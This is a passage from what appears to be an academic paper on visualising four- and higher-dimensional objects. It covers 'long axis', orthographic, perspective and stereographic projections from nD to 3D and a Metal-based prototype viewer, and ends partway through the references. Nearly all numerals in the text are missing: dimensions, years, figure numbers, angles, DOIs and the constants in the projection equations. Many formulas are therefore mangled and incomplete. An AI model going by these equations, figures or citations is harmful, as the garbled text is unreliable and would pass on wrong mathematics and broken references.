obtain a normal vector to a d line as defined by two (different) points p and p , or equivalently a normal vector to a vector from p to p . in d, it is possible to obtain a normal vector to a d plane as defined by three (non-collinear) points p , p and p , or equivalently a normal vector to a pair of vectors from p to p and from p to p . similarly, in nd it is possible to obtain a normal vector to a (n− )d subspace—probably easier to picture as an (n− )-simplex—as defined by n linearly independent points p ,p ,...,pn− , or equivalently a normal vector to a set of n− vectors from p to every other point (i.e., p ,p ,...,pn− ) (massey, ; elduque, ). hanson ( ) follows the latter explanation using a set of n− vectors all starting from the first point to give an intuitive definition of the n-dimensional cross-product. assuming that a point pi in rn is defined by a tuple of coordinates denoted as (pi ,p i ,...,p i n− ) and a unit vector along the ith dimension is denoted as x̂i, the n-dimensional cross-product en of a set of points p ,p ,...,pn− can be expressed compactly as the cofactors of the last column in the following determinant: en = ∣∣∣∣∣∣∣∣∣∣ (p −p ) (p −p ) ··· (p n− ) x̂ (p −p ) (p −p ) ··· (p n− ) x̂ ... ... ... ... ... (p n− −p n− ) (p n− −p n− ) ··· (p n− n− ) x̂n− . ∣∣∣∣∣∣∣∣∣∣ arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the components of the normal vector en are thus given by the minors of the unit vectors x̂ ,x̂ ,...,x̂n− . this vector en–like all other vectors—can be normalised into a unit vector by dividing it by its norm ( en ) . previous work on the visualisation of higher-dimensional objects there is a reasonably extensive body of work on the visualisation of d and nd objects, although it is still more often used for its creative possibilities (e.g., making nice-looking graphics) than for practical applications. in literature, visual metaphors of d space were already described in the sin flatland: a romance of many dimensions (abbott, ) and a new era of thought (hinton, ). other books that treat the topic intuitively include beyond the third dimension: geometry, computer graphics, and higher dimensions (banchoff, ) and the visual guide to extra dimensions: visualizing the fourth dimension, higher-dimensional polytopes, and curved hypersurfaces (mcmullen, ). in a more concrete computer graphics context, already in the s, noll ( ) described a computer implementations of the d to d perspective projection and its application in art (noll, ). beshers & feiner ( ) describe a system that displays animating (i.e. continuously transformed) d objects that are rendered in real-time and use colour intensity to provide a visual cue for the d depth. it is extended to n dimensions by feiner & beshers ( ). banks ( ) describes a system that manipulates surfaces in d space. it describes interaction techniques and methods to deal with intersections, transparency and the silhouettes of every surface. hanson & cross ( ) describes a high-speed method to render surfaces in d space with shading using a d light and occlusion, while hanson ( ) describes much of the mathematics that are necessary for nd visualisation. a more practical implementation is described in hanson, ishkov & ma ( ). chu et al. ( ) describe a system to visualise -manifolds and -manifolds embedded in d space and illuminated by d light sources. notably, it uses a custom rendering pipeline that projects tetrahedra in d to volumetric images in d—analogous to how triangles in d that are usually projected to d images. a different possible approach lies in using meaningful d cross-sections of a d dataset. for instance, kageyama ( ) describes how to visualise d objects as a set of hyperplane slices. bhaniramka, wenger & crawfis ( ) describe how to compute isosurfaces in dimensions higher than three using an algorithm similar to marching cubes. d’zmura, colantoni & seyranian ( ) describe a system that displays d cross-sections of a d virtual world one at a time. similar to the methods described above, hollasch ( ) gives a simple formulation to describe the d to d projections, which is itself based on the d to d orthographic and perspective projection methods described by foley & nielson ( ). this is the method that we extend to define n-dimensional versions of these projections and is thus explained in greater detail below. the mathematical notation is however changed slightly so as to have a cleaner extension to higher dimensions. arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in order to apply the required transformations, hollasch ( ) first defines a point from∈r where the viewer (or camera) is located, a point to∈r that the viewer directly points towards, and a set of two vectors −→ up and−−→over. based on these variables, he defines a set of four unit vectors â, b̂, ĉ and d̂ that define the axes of a d coordinate system centred at the from point. these are ensured to be orthogonal by using the d cross-product to compute them, such that: d̂ = to−from ‖to−from‖ â= up×over×d̂ ‖up×over×d̂‖ b̂= over×d̂×â ‖over×d̂×â‖ ĉ = d̂×â×b̂. note two aspects in the equations above: (i) that the input vectors −→ up and −−→over are left unchanged (i.e., b̂= −→ up and ĉ =−−→over) if they are already orthogonal to each other and orthogonal to the vector from from to to (i.e., to−from), and (ii) that the last vector ĉ does not need to be normalised since the cross-product already returns a unit vector. these new unit vectors can then be used to define a transformation matrix to transform the d coordinates into a new set of points e (as in eye coordinates) with a coordinate system with the viewer at its centre and oriented according to the unit vectors. the points are given by: e = [ p−from ][ â b̂ ĉ d̂ ] . for an orthographic projection given e =[e e e e ], the first three columns e , e and e can be used as-is, while the fourth column e defines the orthogonal distance to the viewer (i.e., the depth). finally, in order to obtain a perspective projection, he scales the points inwards in direct proportion to their depth. starting from e, he computes e′=[e′ e ′ e ′ e ′ ] as: e′ = e e tanϑ/ e′ = e e tanϑ/ e′ = e e tanϑ/ e′ =e . where ϑ is the viewing angle between x and the line between the from point and every point as shown in fig. . a similar computation is done for y and z. in e′, the first three columns (i.e., e′ , e ′ and e ′ ) similarly give the d coordinates for a perspective projection of the d points while the fourth column is also the depth of the point. arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the geometry of a d perspective projection along the x axis for a point p. by analysing the depth along the depth axis given by e , it is possible to see that the coordinates of the point along the x axis, given by e , are scaled inwards in order to obtain e′ based on the viewing angle ϑ. note that x̂n− is an arbitrary viewing hyperplane and another value can be used just as well. methodology we present here three different projections from rn to rn− which can be applied iteratively to bring objects of any dimension down to d for display. we three projections that are reasonably intuitive in d to d: a ‘long axis’ projection that puts d objects side by side, the orthographic and perspective projections that work in the same way as their d to d ana- logues, and a projection to an (n− )-sphere followed by a stereographic projection to rn− . ‘long axis’ projection first we aim to replicate the idea behind the example previously shown in fig. —a series of d objects that are shown next to each other, seemingly projected separately with the correspondences across scale or time shown as long edges (as in fig. ) or faces connecting the d objects. edges would join correspondences between vertices across the models, while faces would join correspondences between elements of dimension up to one (e.g. a pair of edges, or an edge and a vertex). since every d object is apparently projected separately using a perspective projection to d, it is thus shown in the same intuitive way in which a single d object is projected down to d. the result of this projection is shown in fig. for the model previously shown in figs. and in for a d model using d space with time. although to the best of our knowledge this projection does not have a well-known name, it is widely used in explanations of d and nd geometry—especially when drawn by hand or when the intent is to focus on the connectivity between different elements. for instance, it is usually used in the typical explanation for how to construct a tesseract, i.e., a -cube or the d analogue of a d square or d cube, which is based on drawing two cubes and connecting the corresponding vertices between the two (fig. ). among other examples in the scientific literature, this kind of projection can be seen in fig. in yau & srihari ( ), fig. . in hollasch ( ), fig. in banchoff & cervone ( ), figs. – in arenas & pérez-aguila ( ), fig. in grasset-simon, damiand & lienhardt ( ), fig. in paul ( ) and fig. in van oosterom & meijers ( ). conceptually, describing this projection from n to n− dimensions, which we hereafter refer to as a ‘long axis’ projection, is very simple. considering a set of points p in rn, the projected set of points p′ in rn− is given by taking the coordinates of p for the arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (a) (b) (c) figure a model of a d house similar to the example shown previously in fig. , here including also a window and a door that are collapsed to a vertex in the d object at the lower level of detail. (a) shows the two d objects positioned as in fig. , (b) rotates these models ◦ so that the front of the house is on the right, and (c) orients the two d objects front to back. many more interesting views are possible, but these show the correspondences particularly clearly. unlike the other model, this one was generated with d coordinates and projected using our prototype that applies the projection described in this sec- tion. (a) (b) figure we take (a) a simple d model of two buildings connected by an elevated corridor, and model it in d such that the two buildings exist during a time interval [− , ]and the corridor only exists during [− . , . ], resulting in (b) a d model shown here in a ‘long axis’ projection. the two buildings are shown in blue and green for clarity. note how this model shows more saturated colours due to the higher number of faces that overlap in it. figure the typical explanation for how to draw the vertices and edges in an i-cube. starting from a single vertex representing a point (i.e. a -cube), an (i+ )-cube can be created by drawing two i-cubes and connecting the corresponding vertices of the two. image by wikimedia user nerdboy (retrieved from https://commons.wikimedia.org/wiki/file:dimension_levels.svg under a cc by-sa . license). arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://commons.wikimedia.org/wiki/file:dimension_levels.svg http://dx.doi.org/ . /peerj-cs. (d) (e) (f) (a) (b) (c) figure (a–c) the d house model and (d–f) the two buildings model projected down to d using an orthographic projection. the different views are obtained by applying different rotations in d. the less and more detailed d models can be found by looking at where the door and window are collapsed. first n− axes and adding to them the last coordinate of p which is spread over all coordinates according to weights specified in a customisable vector x̂n. for instance, fig. uses x̂n =[ ], resulting in d models that are units displaced for every unit in which they are apart along the n-th axis. in matrix form, this kind of projection can then be applied as p′=p[i x̂n]. orthographic and perspective projections another reasonably intuitive pair of projections are the orthographic and perspective projections from nd to (n− )d. these treat all axes similarly and thus make it more difficult to see the different (n− )-dimensional models along the n-th axis, but they result in models that are much less deformed. also, as shown in the d example in fig. , it is easy to rotate models in such a way that the corresponding features are easily seen. based on the description of d-to- d orthographic and perspective projection described from hollasch ( ), we here extend the method in order to describe the n-dimensional to ( n− )-dimensional case, changing some aspects to give a clearer geometric meaning for each vector. arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. visual cues can still be useful in higher dimensions. see http://eusebeia.dyndns. org/ d/vis/ -hsr. similarly, we start with a point from∈rn where the viewer is located, a point to∈rn that the viewer directly points towards (which can be easily set to the centre or centroid of the dataset), and a set of n− initial vectors−→v ,..., −→v n− in rn that are not all necessarily orthogonal but nevertheless are linearly independent from each other and from the vector to− from. in this setup, the −→v i vectors serve as a base to define the orientation of the system, much like the traditional −→ up vector that is used in d to d projections and the −−→over vector described previously. from the above mentioned variables and using the nd cross-product, it is possible to define a new set of orthogonal unit vectors x̂ ,...,x̂n− that define the axes x ,...,xn− of a coordinate system in rn as: x̂n− = to−from ‖to−from‖ x̂ = −→v ×···× −→v n− ×x̂n− ‖ −→v ×···× −→v n− ×x̂n− ‖ x̂i= −→v i+ ×···× −→v n− ×x̂n− ×x̂ ×···×x̂i− ‖ −→v i+ ×···× −→v n− ×x̂n− ×x̂ ×···×x̂i− ‖ x̂n− = x̂n− ×x̂ ×···×x̂n− . the vector x̂n− is the first that needs to be computed and is oriented along the line from the viewer (from) to the point that it is oriented towards (to). afterwards, the vectors are computed in order from x̂ to x̂n− as normalised n-dimensional cross products of n− vectors. these contain a mixture of the input vectors −→v ,..., −→v n− and the computed unit vectors x̂ ,...,x̂n− , starting from n− input vectors and one unit vector for x̂ , and removing one input vector and adding the previously computed unit vector for the next x̂i vector. note that if−→v ,..., −→v n− and x̂n− are all orthogonal to each other,∀ < i<n− , x̂i is simply a normalised −→v i. like in the previous case, the vectors x̂ ,...,x̂n− can then be used to transform an m×n matrix of m nd points in world coordinates p into an m×n matrix of mnd points in eye coordinates e by applying the following transformation: e = [ p−from ][ x̂ ··· x̂n− ] . as before, if e has rows of the form [e ··· en− ] representing points, e ,...,en− are directly usable as the coordinates in rn− of the projected point in an n-dimensional to (n− )-dimensional orthographic projection, while en− represents the depth, i.e. the distance between the point and the projection (n− )-dimensional subspace, which can be used for visual cues . the coordinates along e ,...,en− could be made to fit within a certain bounding box by computing their extent along each axis, then scaling appropriately using the extent that is largest in proportion to the extent of the bounding box’s corresponding axis. for an n-dimensional to (n− )-dimensional perspective projection, it is only necessary to compute the distance between a point and the viewer along every axis by taking into account the viewing angleϑ between x̂n− and the line between the to point and every point. intuitively, this means that if an object is n times farther than another identical object, it arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://eusebeia.dyndns.org/ d/vis/ -hsr http://eusebeia.dyndns.org/ d/vis/ -hsr https://peerj.com http://dx.doi.org/ . /peerj-cs. figure the geometry of an nd perspective projection for a point p. by analysing each axis x̂i (∀ ≤ i < n− ) independently together with the final axis x̂n− , it is possible to see that the coordinates of the point along that axis, given by ei, are scaled inwards based on the viewing angle ϑ. (a) (b) figure a polyhedron and a polychoron in jenn d: (a) a cube and (b) a -cell. is depicted n times smaller, or n of its size. this situation is shown in fig. and results in new e′ ,...,e ′ n− coordinates that are shifted inwards. the coordinates are computed as: e′i = ei en− tanϑ/ , for ≤ i≤n− . the (n− )-dimensional coordinates generated by this process can then be recursively projected down to progressively lower dimensions using this method. the objects represented by these coordinates can also be discretised into images of any dimension. for instance, hanson ( ) describes how to perform many of the operations that would be required, such as dimension-independent clipping tests and ray-tracing methods. stereographic projection a final projection possibility is to apply a stereographic projection from rn to rn− , which for us was partly inspired by jenn d (http://www.math.cmu.edu/~fho/jenn/) (fig. ). this program visualises polyhedra and polychora embedded in r by first projecting them arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.math.cmu.edu/~fho/jenn/ http://dx.doi.org/ . /peerj-cs. intuitively, an unbounded volume that wraps around itself, much like a -sphere can be seen as an unbounded surface that wraps around itself. inwards/outwards to the volume of a -sphere and then projecting them stereographically to r , resulting in curved edges, faces and volumes. in a dimension-independent form, this type of projection can be easily done by considering the angles ϑ ,...,ϑn− in an n-dimensional spherical coordinate system. steeb ( , § . ) formulates such a system as: r = √ x +···+x n− ϑi=cos −   xi√ r − ∑i− j= x j  , for ≤ i<n− ϑn− = tan − ( xn− xn− ) . it is worth to note that the radius r of such a coordinate system is a measure of the depth with respect to the projection (n− )-sphere sn− and can be used similarly to the previous projection examples. the points can then be converted back into points on the surface of an (n− )-sphere of radius by making r = and applying the inverse transformation. steeb ( , § . ) formulates it as: xi=rcos ϑi i− ∏ j= sin ϑj, for ≤ i<n− xn− =r n− ∏ j= sin ϑj. the next step, a stereographic projection, is also easy to apply in higher dimensions, mapping an (n+ )-dimensional point x = (x ,...,xn) on an n-sphere sn to an n- dimensional point x′=(x ,...,xn− ) in the n-dimensional euclidean space rn. chisholm ( ) formulates this projection as: x′i = xi xn− , for ≤ i<n. the stereographic projection from nd to (n− )d is particularly intuitive because it results in the n-th axis being converted into an inwards-outwards axis. as shown in fig. , when it is applied to scale, this results in models that decrease or increase in detail as one moves inwards or outwards. the case with time is similar: as one moves inwards/outwards, it is easy to see the state of a model at a time before/after. results we have implemented a small prototype for an interactive viewer of arbitrary d objects that performs the three projections previously described. it was used to generate figs. , and , which were obtained by moving around the scene, zooming in/out and capturing screenshots using the software. the prototype was implemented using part of the codebase of azul (https://github.com/tudelft d/azul) and is written in a combination of swift and arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/tudelft d/azul http://dx.doi.org/ . /peerj-cs. (a) (b) figure (a) the d house model and (b) the two buildings model projected first inwards/outwards to the closest point on the -sphere s and then stereographically to r . the round surfaces are ob- tained by first refining every face in the d models. c++ using metal—a low-level and low-overhead graphics api—under macos . (https://developer.apple.com/metal/). by using metal, we are able to project and display objects with several thousand polygons with minimal visual lag on a standard computer. its source code is available under the gplv licence at https://github.com/kenohori/azul d. we take advantage of the fact that the metal shading language—as well as most other linear algebra libraries intended for computer graphics—has appropriate data structures for d geometries and linear algebra operations with vectors and matrices of size up to four. while these are normally intended for use with homogeneous coordinates in d space, they can be used to do various operations in d space with minor modifications and by reimplementing some operations. unfortunately, this programming trick also means that extending the current prototype to dimensions higher than four requires additional work and rather cumbersome programming. however, implementing these operations in a dimension-independent way is rather not difficult outside in a more flexible programming environment. for instance, fig. shows how a double stereographic projection can be used to reduce the dimensionality of an object from d to d. this figure was generated in a separate c++ program which exports its results to an obj file. the models were afterwards rendered in blender (https://www.blender.org). in our prototype, we only consider the vertices, edges and faces of the d objects, as the higher-dimensional d and d primitives—whose d, d and d boundaries are however shown—would readily obscure each other in any sort of d or d visualisation (banks, ). every face of an object is thus stored as a sequence of vertices with coordinates in r and is appended with an rgba colour attribute with possible transparency. the alpha value of each face is used see all faces at once, as they would otherwise overlap with each other on the screen. the d models were manually constructed based on defining their vertices with d coordinates and their faces as successions of vertices. in addition to the d house previously arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://developer.apple.com/metal/ https://github.com/kenohori/azul d https://www.blender.org http://dx.doi.org/ . /peerj-cs. this is sufficient for our purposes, but other applications would need to find three linearly-independent points or to use a more computationally expensive method that finds the best fitting plane for the face. an alternative would be to embed these in d from the beginning, but it would result in distorted shapes depending on their position and orientation due to the extra degrees of rotational freedom in r . (a) (b) figure (a) a stereographic projection of a -orthoplex and (b) a double stereographic projection of a -orthoplex. the family of orthoplexes contains the analogue shapes of a d square or a d octahedron. shown, we built a simpler tesseract for testing. as built, the tesseract consists of vertices and vertices, while the d house consists of vertices and faces. however, we used the face refining process described below to test our prototype with models with up to a few thousand faces. once created, the models were still displayed and manipulated smoothly. to start, we preprocess a d model by triangulating and possibly refining each face, which makes it possible to display concave faces and to properly see the curved shapes that are caused by the stereographic projection previously described. for this, we first compute the plane passing through the first three points of each face and project each point from r to a new coordinate system in r on the plane. we then triangulate and refine separately each face in r with the help of a few packages of the computational geometry algorithms library (cgal) (http://www.cgal.org), and then we reproject the results back to the previously computed plane in r . we then use a metal shading language compute shader—a technique to perform general-purpose computing on graphics processing units (gpgpu)—in order to apply the desired projection from r to r . the three different projections presented previously are each implemented as a compute shader. by doing so, it is easier to run them as separate computations outside the graphics pipeline, to then extract the projected r vertex coordinates of every face and use them to generate separate representations of their bounding edges and vertices . using their projected coordinates in r , the edges and vertices surrounding each face are thus displayed respectively as possibly refined line segments and as icosahedral approximations of spheres (i.e., icospheres). finally, we use a standard perspective projection in a metal vertex shader to display the projected model with all its faces, edges and vertices. we use a couple of tricks in order to keep the process fast and as parallel as possible: separate threads for each cpu process (the generation of the vertex and edge geometries and the modification of the projection matrices according to user interaction) and gpu process ( d-to- d projection and d-to- d projection for display), and blending with order-independent transparency arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.cgal.org http://dx.doi.org/ . /peerj-cs. without depth checks. for complex models, this results in a small lag where the vertices and edges move slightly after the faces. in the current prototype, we have implemented a couple functions to interact with the model: rotations in d and translations in d. in d, the user can rotate the model around the six possible rotation planes by clicking and dragging while pressing different modifier keys. in d, it is possible to move a model around using d scrolling on a touchpad to shift it left/right/up/down and using pinch gestures to shift it backward/forward (according to the current view). discussion and conclusions visualising complete d and nd objects projected to d and displayed in d is often unintuitive, but it enables analysing higher-dimensional objects in a thorough manner that cross-sections do not. the three projections we have shown here are nevertheless reasonably intuitive due to their similarity to common projections from d to d, the relatively small distortions in the models and the existence of a clear fourth axis. they also have a dimension-independent formulation. there are however many other types of interesting projections that can be defined in any dimension, such as the equirectangular projection where evenly spaced angles along a rotation plane can be directly converted into evenly spaced coordinates—in this case covering ◦ vertically and ◦ horizontally. extending such a projection to nd would result in an n-orthotope, such as a (filled) rectangle in d or a cuboid (i.e., a box) in d. by applying the projections shown in this paper to d objects depicting d objects that change in time or scale, it is possible to see at once all correspondences between different elements of the d objects and the topological relationships between them. compared to other d visualisation techniques, we opt for a rather minimal approach without lighting and shading. in our application, we believe that this is optimal due to better performance and because it makes for simpler-looking and more intuitive output. in this manner, progressively darker shades of a colour are a good visual cue for the number of faces of the same colour that are visually overlapping at any given point. since we apply the projection from d to d in the gpu, it is not efficient to extract the surfaces again in order to compute the d normals required for lighting in d, while lighting in d results in unintuitive visual cues. additional information and declarations funding this research is supported by the dutch technology foundation stw, which is part of the netherlands organisation for scientific research (nwo), and which is partly funded by the ministry of economic affairs (project code: ). this project has received funding from the european research council (erc) under the european union’s horizon research and innovation programme (grant agreement no umnd). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: dutch technology foundation stw. netherlands organisation for scientific research (nwo). european union’s horizon research and innovation programme: umnd. ministry of economic affairs: . competing interests the authors declare there are no competing interests. author contributions • ken arroyo ohori conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • hugo ledoux and jantien stoter analyzed the data, wrote the paper, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: github: https://github.com/kenohori/azul d. references abbott ea. . flatland: a romance of many dimensions. london: seely & co. abiteboul s, hull r. . update propagation in the ifo database model. in: ghosh sp, kambayashi y, tanaka k, eds. foundations of data organization. new york: springer us, – . arenas y, pérez-aguila r. . visualizing d projections of higher dimensional polytopes: an approach linking art and computers. in: memorias del cuarto congreso nacional de ciencias de la computacion. armstrong mp. . temporality in spatial databases. in: gis/lis’ : proceedings: accessing the world: third annual international conference, exhibits, and workshops. bethesda: american society for photogrammetry and remote sensing, – . arroyo ohori k. . higher-dimensional modelling of geographic information. phd thesis, delft university of technology. arroyo ohori k, boguslawski p, ledoux h. . representing the dual of objects in a four-dimensional gis. in: abdul rahman a, boguslawski p, gold c, said m, eds. developments in multidimensional spatial data models. lecture notes in geoinformation and cartography, berlin, heidelberg: springer, – . arroyo ohori k, damiand g, ledoux h. . constructing an n-dimensional cell complex from a soup of (n- )-dimensional faces. in: gupta p, zaroliagis c, eds. applied algorithms. first international conference, icaa , kolkata, india, january – , . proceedings. lecture notes in computer science, vol. . kolkata: springer international publishing switzerland, – . arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/kenohori/azul d http://dx.doi.org/ . /peerj-cs. arroyo ohori k, ledoux h, biljecki f, stoter j. a. modelling a d city model and its levels of detail as a true d model. isprs international journal of geo-information ( ): – doi . /ijgi . arroyo ohori k, ledoux h, stoter j. b. an evaluation and classification of nd topological data structures for the representation of objects in a higher-dimensional gis. international journal of geographical information science ( ): – doi . / . . . arroyo ohori k, ledoux h, stoter j. c. storing a d city model, its levels of detail and the correspondences between objects as a d combinatorial map. in: rahman aa, isikdag u, castro fa, eds. joint international geoinformation conference , – october , kuala lumpur, malaysia. isprs annals of the photogrammetry, remote sensing and spatial information sciences, vol. ii– /w . kuala lumpur: isprs, – . arroyo ohori k, ledoux h, stoter j. . modelling and manipulating spacetime objects in a true d model. journal of spatial information science : – . ballard dh. . strip trees: a hierarchical representation for curves. communications of the acm ( ): – doi . / . . banchoff t, cervone dp. . illustrating beyond the third dimension. leonardo ( – ): – doi . / . banchoff tf. . beyond the third dimension: geometry, computer graphics, and higher dimensions. new york: scientific american library series. banks d. . interactive manipulation and display of surfaces in four dimensions. in: i d’ proceedings of the symposium on interactive d graphics. acm, – . beshers cm, feiner sk. . real-time d animation on a d graphics workstation. in: graphics interface’ . edmonton: chccs/scdhm, – . bhaniramka p, wenger r, crawfis r. . isosurfacing in higher dimensions. in: vis’ proceedings of the conference on visualization’ . piscataway: ieee. bieri h, nef w. . elementary set operations with d-dimensional polyhedra. in: noltemeier h, ed. computational geometry and its applications. lecture notes in computer science, vol. . berlin, heidelberg: springer, – . brisson e. . representing geometric structures in d dimensions: topology and order. discrete & computational geometry : – doi . /bf . buttenfield bp, delotto js. . multiple representations: scientific report for the specialist meeting. technical report – . santa barbara: national center for geographic information and analysis. chisholm m. . the sphere in three dimensions and higher: generalizations and special cases. available at https://theory.org/geotopo/ -sphere/ -sphere.ps. chrisman nr. . the role of quality information in the long-term functioning of a geographic information system. cartographica. chu a, fu c-w, hanson aj, heng p-a. . gl d: a gpu-based architecture for interactive d visualization. in: ieee transactions on visualization and computer graphics. d . piscataway: ieee, – . arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ijgi http://dx.doi.org/ . / . . http://dx.doi.org/ . / . http://dx.doi.org/ . / http://dx.doi.org/ . /bf https://theory.org/geotopo/ -sphere/ -sphere.ps http://dx.doi.org/ . /peerj-cs. Čomić l, de floriani l. . modeling and manipulating cell complexes in two, three and higher dimensions. lecture notes in computational vision and biomechanics, vol. dordrecht: springer, – , chapter . descartes r. . discours de la méthode. leyde: jan maire. d’zmura m, colantoni p, seyranian g. . virtual environments with four or more spatial dimensions. presence ( ): – doi . / . elduque a. . vector cross products. talk presented at the seminario rubio de francia of the universidad de zaragoza on april , . available at http://www. unizar.es/matematicas/algebra/elduque/talks/crossproducts.pdf . feiner s, beshers c. . visualizing n-dimensional virtual worlds with n-vision. in: proceedings of the symposium on interactive d graphics. acm, – . filho wc, de figueiredo lh, gattass m, carvalho pc. . a topological data struc- ture for hierarchical planar subdivisions. technical report cs- - . department of computer science, university of waterloo. foley jd, van dam a, feiner sk, hughes jf. . computer graphics: principles and practice in c. boston: addison-wesley professional. foley ta, nielson gm. . practical techniques for producing d graphical images. in: black j, ed. the system engineer’s handbook: a guide to building vmebus and vxibus systems. san diego: academic press, – , chapter . frank au. . four-dimensional representation in human cognition and difficulties with demonstrations: a commentary on wang. spatial cognition & computation : – doi . / . . . friis-christensen a, jensen cs. . object-relational management of multiply represented geographic entities. in: proceedings of the th international conference on scientific and statistical database management. piscataway: ieee computer society, – . grafarend ew, you r-j. . map projections: cartographic information systems. berlin, heidelberg: springer-verlag. grasset-simon c, damiand g, lienhardt p. . nd generalized map pyramids: definition, representations and basic operations. pattern recognition ( ): – doi . /j.patcog. . . . gröger g, kolbe th, nagel c, häfele k-h. . ogc city geography markup lan- guage (citygml) encoding standard. version . . . open geospatial consortium. guibas lj, stolfi j. . primitives for the manipulation of general subdivisions and the computation of voronoi diagrams. acm transactions on graphics ( ): – doi . / . . günther o. . the arc tree: an approximation scheme to represent arbitrary curved shapes. in: efficient structures for geometric data management. lecture notes in computer science, vol. berlin, heidelberg: springer, – , chapter . güting rh, böhlen mh, erwig m, jensen cs, lorentzos na, schneider m, vazirgiannis m. . a foundation for representing and querying moving objects. acm transactions on database systems ( ): – doi . / . . arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://www.unizar.es/matematicas/algebra/elduque/talks/crossproducts.pdf http://www.unizar.es/matematicas/algebra/elduque/talks/crossproducts.pdf http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. hägerstrand t. . what about people in regional science? papers of the regional science association ( ): – doi . /bf . hamre t, mughal ka, jacob a. . a d marine data model: design and application in ice monitoring. marine geodesy ( – ): – doi . / . hansen hØ, christensen nj. . a model for n-dimensional boundary topology. in: proceedings of the nd acm symposium on solid modelling and applications. new york: acm,. hanson aj. . geometry for n-dimensional graphics. in: heckbert ps, ed. graphics gems iv. san diego: academic press professional, – , chapter . . hanson aj, cross ra. . interactive visualization methods for four dimensions. in: vis’ proceedings of the th conference on visualization’ . new york: acm, – . hanson aj, ishkov ki, ma jh. . meshview: visualizing the fourth dimension. technical report. indiana university. hinton ch. . a new era of thought. london: swan sonnenschein & co. ltd. hollasch sr. . four-space visualization of d objects. master’s thesis, arizona state university. hornsby k, egenhofer mj. . modeling moving objects over multiple granularities. annals of mathematics and artificial intelligence ( – ): – . jones c, abraham i. . design considerations for a scale-independent cartographic database. in: marble d, ed. proceedings of the nd international symposium on spatial data handling. – . kada m. . scale-dependent simplification of d building models based on cell decomposition and primitive instancing. in: cosit . lecture notes in computer science, vol. . berlin, heidelberg: springer-verlag, – . kageyama a. . a visualization method of four dimensional polytopes by oval display of parallel hyperplane slices. available at https://arxiv.org/pdf/ . .pdf. kraak m-j. . the space-time cube revisited from a geovisualization perspective. in: proceedings of the st international cartographic conference, – . lienhardt p. . n-dimensional generalized combinatorial maps and cellular quasi- manifolds. international journal of computational geometry and applications ( ): – doi . /s . luebke d, reddy m, cohen jd, varshney a, watson b, huebner r. . level of detail for d graphics. burlington: morgan kaufmann publishers. massey ws. . cross products of vectors in higher dimensional euclidean spaces. the american mathematical monthly ( ): – doi . / . masuda h. . topological operators and boolean operations for complex-based non- manifold geometric models. computer-aided design ( ): – . mckenzie jw, williamson ip, hazelton n. . -d adaptive gis: justification and methodologies. technical report. department of geomatics, the university of melbourne. arroyo ohori et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bf http://dx.doi.org/ . / https://arxiv.org/pdf/ . .pdf http://dx.doi.org/ . /s http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. mcmullen c. . the visual guide to extra dimensions: visualizing the fourth dimension, higher-dimensional polytopes, and curved hypersurfaces. scotts valley: createspace independent publishing platform. meijers m. a. the space-scale cube: an integrated model for d polygonal areas and scale. in: fendel em, ledoux h, rumor m, zlatanova s, eds. proceedings of the th urban data management symposium. delft: isprs archives, – vol. xxxviii- /c . meijers m. b. variable-scale geo-information, phd thesis, delft university of technology. muller de, preparata fp. . finding the intersection of two convex polyhedra. theoretical computer science ( ): – doi . / - ( ) - . noll am. . a computer technique for displaying n-dimensional hyperobjects. communications of the acm ( ): – doi . / . . noll am. . computer animation and the fourth dimension. in: proceedings of the december - , , fall joint computer conference, part ii. acm, – . paul n. . signed simplicial decomposition and overlay of n-d polytope complexes. available at http://arxiv.org/abs/ . . peucker tk, chrisman nr. . cartographic data strutures. the american cartogra- pher ( ): – doi . / . peuquet dj. . it’s about time: a conceptual framework for the representation of temporal dynamics in geographic information systems. annals of the association of american geographers ( ): – doi . /j. - . .tb .x. peuquet dj, duan n. . an event-based spatiotemporal data model (estdm) for temporal analysis of geographical data. international journal of geographical information science ( ): – doi . / . plümer l, gröger g. . achieving integrity in geographic information systems—maps and nested maps. geoinformatica ( ): – doi . /a: . poincaré m. . analysis situs. journal de l’École polytechnique ( ): – . requicha aag, voelcker hb. . constructive solid geometry. technical memoran- dum . college of engineering & applied science, the university of rochester. riemann b. . ueber die hypothesen, welche der geometrie zu grunde liegen. in: abhandlungen der königlichen gesellschaft der wissenschaften zu göttingen. vol. . göttingen: königlichen gesellschaft der wissenschaften. rigaux p, scholl m. . multi-scale partitions: application to spatial and statistical databases. in: egenhofer mj, herring jr, eds. advances in spatial databases. lecture notes in computer science, vol. . berlin, heidelberg: springer, – . rossignac j, o’connor 